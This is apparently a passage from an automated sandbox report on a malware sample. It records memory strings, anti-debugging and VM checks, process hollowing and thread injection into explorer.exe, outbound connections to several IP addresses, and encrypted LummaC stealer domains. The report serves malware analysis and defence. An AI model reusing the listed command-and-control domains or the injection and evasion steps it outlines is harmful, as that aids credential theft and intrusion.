N+uvD/c-ekfJ8qAfi0FYR4Jy7SIQBTqFizuOVgzpLIIDwaPPbiU-ekjdD17WnDCjU9PDpOl5lcDG0BwAhYsIbXGrIdCnOz0-ek2FSziiVwYxjuTXzWIF6/2kO+/WZvY+eFr/CefS6+E-elNHbGyW92ZstgLGATu0mHA3SSbISDtdtkpFtRhjxEQ-em+NbzjKc+3YhyAuUDXOgZnYqngRJ897dXrqa00xpbo-ensT1UE3wz/HlezwbWGtMWa9OZf6aBzrndB8LoZ4cVA-eoIxWUkdpDh34fE24Fv65/tHKVLCzfag642xN8IllOU-eoOGhT9aVFRI247Ejw83FZf7GX2NsALrHN3pfR8Zba8-eoYhAd1Izs8/Mq/KRJst1hqNRbhdig4Hfh4Xiop8vxo-eo5PoeVaxkx97uTuBempEP7+uCHa4EoTsiI11dzK6lE-eo8wZvwSUmtNza148gr+4eIv7mREQH5hcXdptYLLSsA-epTxdIKr3fCTYCUyTXPQR/U5AzjKQohjifv4QFESylw-epc7fswQTO9ZHjKBKREWxvccpM8L93ivdKmTiwbyzeQ-eqFnMHheHumUaOZ5/tJTZb0+DDfOC5/rd0pDKNQHd58-eqvZCbB1ZTcQyXOSBfCjTy7E2MYz2xAjVNLO/dGK+os-erBWDQZczqfm0HxNYvnPQtH3LwKVs0F+oP1G9qJ1jrE-erovMFWX+/u4JsrSpcXJb+Q0DdmqJpHmOdusN5GnY7A-eshBQCcBl8aWg1FXGs2G3qduoR0Sd18Phu2S3LeN93c-eswIJDJzP95T1os79KuG40FcM3fVkSNIbNKj4ON2Vo8-etaVDqjXcRAUPdZ0iq1RSrN91fMaWvXekWtW5WaPfpU-etsrVCOBbnFnW4xNBWulwyhMftp33UtPx4qogYffOPc-euLo8hQxOGnYXxBLwBCLYra25Xu+qUoFb0LRPkSpuT4-evDzh83iZQOGwhThpcGKEPSZmyP6frEKTMFZ9apc634-evLuTQzTLqFK7M5+SuQ5yl7t1q/w44Jf1ItEjtDmGyo-ev3nFqwnuo9IU5OFG44orT5hbzlCf7OWLn2wBnNC8tg-ewyI6Lej9rYYIBZ4idnQ+WstBe5Rm9Z8XMa0TR57r3o-ezUNfgjMc7FKnykM7ACEZfUqTlFu6Q11YurigiTxDeA-ezgda5H9moseim738Ag96i9WAZhZJmZ38+qNxa8k3B0-ez+oi00DYMB7+cVXh4fuork1b7Sy0QlgoJk6XgiU/AM-e0rdYYXwlP79lnKahz0VNAT0W4/55MTNlxRP3DOs9ug-e1J2hsjxZih5j9VZK2SPw/G2ounsBdVCdXvrLoTxMv0-e1gSpno6KmV6x2PZKS7qKrdDWq8DO3RS7TIEUcqixpI-e1tnHkrve/ex6423Gj3ifjmPJAeU19bbWwHE+i04XsE-e162F938bxWKKyCYK91G8byPqOqGTyji6LBQFDRT2zc-e22kuU/RfDacLE+l/KpyVGGEoHLZyLBIpjquN237lT0-e35/gDdiLRBRq31
                Source: 572.exe, 00000009.00000003.2559904607.000000000396A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2499317151.000000000396A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2520530332.000000000396A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2642299627.000000000396A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8U/Wrduc6jvwcwAlj44kh3VVEHh2YYTbNuDJHs-eX99lDaw5cKZrB1NSUcnNo2NCvjRF+TL8DD+i9M+EYE-eYMMgMzpB/NtbQPiBSEmT4KtYcYocIH4Z4rBzfNhZjA-eYaRw4YPYc5AKnINUyLkd92OAhZR+mnFutTa5DUmo24-eZDgh3X6wxy6O3ZuQk14pwtfgmFhvEOHsp2MjGe7zx0-eZTejzfmPScNC3VtxJzu3uhLk5hhQZbqXaHZx5ZgZII-eZTpG+ymvaJ8/fuGSOkGEbdchSRNMw1HXbELtWBcLiQ-eZsUymQ/21Wpp53KM/AIyr6nL9qfXvwMT1gfgz2l2Bo-eaG7eljku31+HW8ixYvvsP1q3wrWZ6aVNEw6TD54KN4-eayshj8+eG34n2TPo5l0P90Ik62D9RYHDSO+hIuldAQ-ebrS2le4TUMiQA0H5KeLbW0JYr4TxHtmxCpTBhDWlHc-ebrh+ZspUq5lEywffQwq6W+zSSif/JlrN69zNWsq1Bc-ebyzC+DtVRPIF6Amzsarkwqtt0pfNuJjIb8fekI7wxM-eb8zsfVnnZhkUi3+LAkxK7nK63SXVt862YmvhmF/EcA-ec9YVs5ul8kjyCUt3CsKWbD2/BHNzDQVkYnrK7oK4uw-eda1zkXIojowugTye4QJfSkQTtzJAnf6dRWmxy+xPTY-edhWOlEbQ9ZEB7LidauaVtlBOWJvswwoiiL6QHTytXw-ed5xGXeVKeAL2ecyTEL69vEUoNtgz+8RadCfC7g8c4I-efIe5RnJujZDKhozIjjTsHp1RkAhji3p2GiLl36u3QM-efWzHX4L5519v26PS8o5kxtcT3Y6ReIfS0WsUL97s+M-efYtkIDxUWjXRo22oTuvp26KnDNaRWG+tKs1jN+7LEE-efvcdUPS6zT9LYIiVHXPAjyGA/VAiY2mCRaVLEVAPzA-ef1VU7jocEiCrbPRXz3z/Wqul7QhDFSJEjM8DaO4SwI-egrOXasNRUwSfypsv2GSNCsQSPFFciuicmi0dpI0sU4-egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs-eiIMxS+q4kA6Oszx1FETHeYsU3hJ/nAGraIv1XaU93U-eiheONssC27rafOVP++3DRnD3+wmX9BkYaLyoIqplDQ-eimk/v27DM9+TYfptEZJlzCEFMsdZ4LVqFYiY9wOTMI-ei9NmNSqE18cJ4zpx/8UwnnWMmvdqxAzfTVXNB/oXJs-ejJvlKMDa64hrz37oWYT/gY9Q06vQWbcI9GVWPmlwhQ-ejLh9VI0ksR79ltiChqc6n/oNUkV1+RDRs+jr4gMku0-ekNbNuxpg4pAhaL2iol5RigFAMzRMm27+lXwLSZ8fS0-ekSeyvflA23x/eAHqptuiyCE5PLmWX5ElhGSN+uvD/c-ekfJ8qAfi0FYR4Jy7SIQBTqFizuOVgzpLIIDwaPPbiU-ekjdD17WnDCjU9PDpOl5lcDG0BwAhYsIbXGrIdCnOz0-ek2FSziiVwYxjuTXzWIF6/2kO+/WZvY+eFr/CefS6+E-elNHbGyW92ZstgLGATu0mHA3SSbISDtdtkpFtRhjxEQ-em+NbzjKc+3YhyAuUDXOgZnYqngRJ897dXrqa00xpbo-ensT1UE3wz/HlezwbWGtMWa9OZf6aBzrndB8LoZ4cVA-eoIxWUkdpDh34fE24Fv65/tHKVLCzfag642xN8IllOU-eoOGhT9aVFRI247Ejw83FZf7GX2NsALrHN3pfR8Zba8-eoYhAd1Izs8/Mq/KRJst1hqNRbhdig4Hfh4Xiop8vxo-eo5PoeVaxkx97uTuBempEP7+uCHa4EoTsiI11dzK6lE-eo8wZvwSUmtNza148gr+4eIv7mREQH5hcXdptYLLSsA-epTxdIKr3fCTYCUyTXPQR/U5AzjKQohjifv4QFESylw-epc7fswQTO9ZHjKBKREWxvccpM8L93ivdKmTiwbyzeQ-eqFnMHheHumUaOZ5/tJTZb0+DDfOC5/rd0pDKNQHd58-eqvZCbB1ZTcQyXOSBfCjTy7E2MYz2xAjVNLO/dGK+os-erBWDQZczqfm0HxNYvnPQtH3LwKVs0F+oP1G9qJ1jrE-erovMFWX+/u4JsrSpcXJb+Q0DdmqJpHmOdusN5GnY7A-eshBQCcBl8aWg1FXGs2G3qduoR0Sd18Phu2S3LeN93c-eswIJDJzP95T1os79KuG40FcM3fVkSNIbNKj4ON2Vo8-etaVDqjXcRAUPdZ0iq1RSrN91fMaWvXekWtW5WaPfpU-etsrVCOBbnFnW4xNBWulwyhMftp33UtPx4qogYffOPc-euLo8hQxOGnYXxBLwBCLYra25Xu+qUoFb0LRPkSpuT4-evDzh83iZQOGwhThpcGKEPSZmyP6frEKTMFZ9apc634-evLuTQzTLqFK7M5+SuQ5yl7t1q/w44Jf1ItEjtDmGyo-ev3nFqwnuo9IU5OFG44orT5hbzlCf7OWLn2wBnNC8tg-ewyI6Lej9rYYIBZ4idnQ+WstBe5Rm9Z8XMa0TR57r3o-ezUNfgjMc7FKnykM7ACEZfUqTlFu6Q11YurigiTxDeA-ezgda5H9moseim738Ag96i9WAZhZJmZ38+qNxa8k3B0-ez+oi00DYMB7+cVXh4fuork1b7Sy0QlgoJk6XgiU/AM-e0rdYYXwlP79lnKahz0VNAT0W4/55MTNlxRP3DOs9ug-e1J2hsjxZih5j9VZK2SPw/G2ounsBdVCdXvrLoTxMv0-e1gSpno6KmV6x2PZKS7qKrdDWq8DO3RS7TIEUcqixpI-e1tnHkrve/ex6423Gj3ifjmPJAeU19bbWwHE+i04XsE-e162F938bxWKKyCYK91G8byPqOqGTyji6LBQFDRT2zc-e22kuU/RfDacLE+l/KpyVGGEoHLZyLBIpjquN237lT0-e35/gDdiLRBRq
                Source: explorer.exe, 00000002.00000000.2124664252.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
                Source: 572.exe, 00000009.00000003.3323922869.000000000529C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: an6zYaGMDELrubWA6FhgFsrtk9CuIiIJYZhvenKIZdE2mgMRErUH3EbfjlSKpYro
                Source: 572.exe, 00000009.00000003.2470228405.0000000003622000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2468189486.00000000034D3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2481604946.00000000038C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m UmVW9JP3JpLzwoz36YtcTnDnWTf7ggvQEMuK44kS0i0
                Source: 572.exe, 00000009.00000003.3353352059.0000000000CA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBANISBQMG9FQEmUYbqSHKCMVy6pp7Lg62kDV5bh2nFFvTob4Cf4Z3gvXv
                Source: 572.exe, 00000009.00000003.2493956741.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2507355054.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2496053848.0000000002C03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >7:qEmu|Z
                Source: explorer.exe, 00000002.00000000.2124664252.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                Source: explorer.exe, 00000002.00000000.2121587581.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
                Source: 572.exe, 00000009.00000003.3353352059.0000000000CA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Fi/NaU/VvYUxcVTz4vaYs2NRFcShZgtsVKBQ39+vmcICB7VZbxFYSGTVNsAYOU0j
                Source: explorer.exe, 00000002.00000000.2127512556.000000000C24C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2125091063.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
                Source: 572.exe, 00000009.00000003.3303625742.0000000005297000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBAMpw/WCd/IDa5l0tFR8Y4cKF5IIxeWDmKPL6OSCRJ8GHgfSeF2iGu2ab
                Source: FE8B.exe, 00000007.00000002.2647046758.00000000010F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: explorer.exe, 00000002.00000000.2121587581.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000002.00000000.2121587581.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\AppData\Local\Temp\93B.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,10_2_00409543
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_00401114 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00401114
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CB070 LoadLibraryW,GetProcAddress,VirtualProtect,8_2_005CB070
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_0055092B mov eax, dword ptr fs:[00000030h]0_2_0055092B
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00550D90 mov eax, dword ptr fs:[00000030h]0_2_00550D90
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_005DF22D push dword ptr fs:[00000030h]0_2_005DF22D
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_004C092B mov eax, dword ptr fs:[00000030h]6_2_004C092B
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_004C0D90 mov eax, dword ptr fs:[00000030h]6_2_004C0D90
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_005EE9F5 push dword ptr fs:[00000030h]6_2_005EE9F5
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_023CC0A3 push dword ptr fs:[00000030h]8_2_023CC0A3
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_02590042 push dword ptr fs:[00000030h]8_2_02590042
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_0040AEA4 mov eax, dword ptr fs:[00000030h]10_2_0040AEA4
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_00407D21 mov eax, dword ptr fs:[00000030h]10_2_00407D21
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_00407D21 mov eax, dword ptr fs:[00000030h]16_2_00407D21
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_0040AEA4 mov eax, dword ptr fs:[00000030h]16_2_0040AEA4
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CBB00 GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,DestroyIcon,_memset,SetDefaultCommConfigW,FreeEnvironmentStringsW,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoA,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryA,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessHeap,_wprintf,_calloc,_calloc,_memset,_calloc,SetProcessWorkingSetSize,8_2_005CBB00
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_00401114 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00401114
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_00403309 SetUnhandledExceptionFilter,8_2_00403309
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_00402F85 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00402F85
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 9_2_006943E0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_006943E0
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 9_2_00694A78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00694A78
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Benign windows process drops PE files
                Source: C:\Windows\explorer.exeFile created: 93B.exe.2.drJump to dropped file
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 172.67.213.22 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 2.180.10.7 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 91.215.85.120 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 185.172.128.19 80Jump to behavior
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_02590110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,8_2_02590110
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeThread created: C:\Windows\explorer.exe EIP: 2DF1A88Jump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveThread created: unknown EIP: 31C1A88Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\572.exeMemory written: C:\Users\user\AppData\Local\Temp\572.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\ProgramData\Drivers\csrss.exeMemory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
                LummaC encrypted strings found
                Source: FE8B.exe, 00000007.00000002.2644589821.0000000000174000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: sofahuntingslidedine.shop
                Source: FE8B.exe, 00000007.00000002.2644589821.0000000000174000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: culturesketchfinanciall.shop
                Source: FE8B.exe, 00000007.00000002.2644589821.0000000000174000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: triangleseasonbenchwj.shop
                Source: FE8B.exe, 00000007.00000002.2644589821.0000000000174000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: modestessayevenmilwek.shop
                Source: FE8B.exe, 00000007.00000002.2644589821.0000000000174000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: liabilityarrangemenyit.shop
                Source: FE8B.exe, 00000007.00000002.2644589821.0000000000174000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: claimconcessionrebe.shop
                Source: FE8B.exe, 00000007.00000002.2644589821.0000000000174000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: secretionsuitcasenioise.shop
                Source: FE8B.exe, 00000007.00000002.2644589821.0000000000174000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: gemcreedarticulateod.shop
                Source: FE8B.exe, 00000007.00000002.2644589821.0000000000174000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: resergvearyinitiani.shop
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,18_2_00478420
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess created: C:\Users\user\AppData\Local\Temp\572.exe C:\Users\user\AppData\Local\Temp\572.exeJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 1424
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: unknown unknown
                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_004082B6 CheckTokenMembership,AllocateAndInitializeSid,FreeSid,10_2_004082B6
                Source: explorer.exe, 00000002.00000000.2121809250.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: explorer.exe, 00000002.00000000.2122711669.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2121809250.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000002.00000000.2121809250.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000002.00000000.2121587581.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
                Source: explorer.exe, 00000002.00000000.2121809250.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000002.00000000.2125091063.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,8_2_0040DC53
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_0040E079
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_0040E012
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,8_2_0040DCFA
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,8_2_0040E0B5
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,8_2_0040DD55
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetLocaleInfoA,8_2_00411109
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,8_2_0040B1BE
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,8_2_0040A244
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,8_2_0040AED0
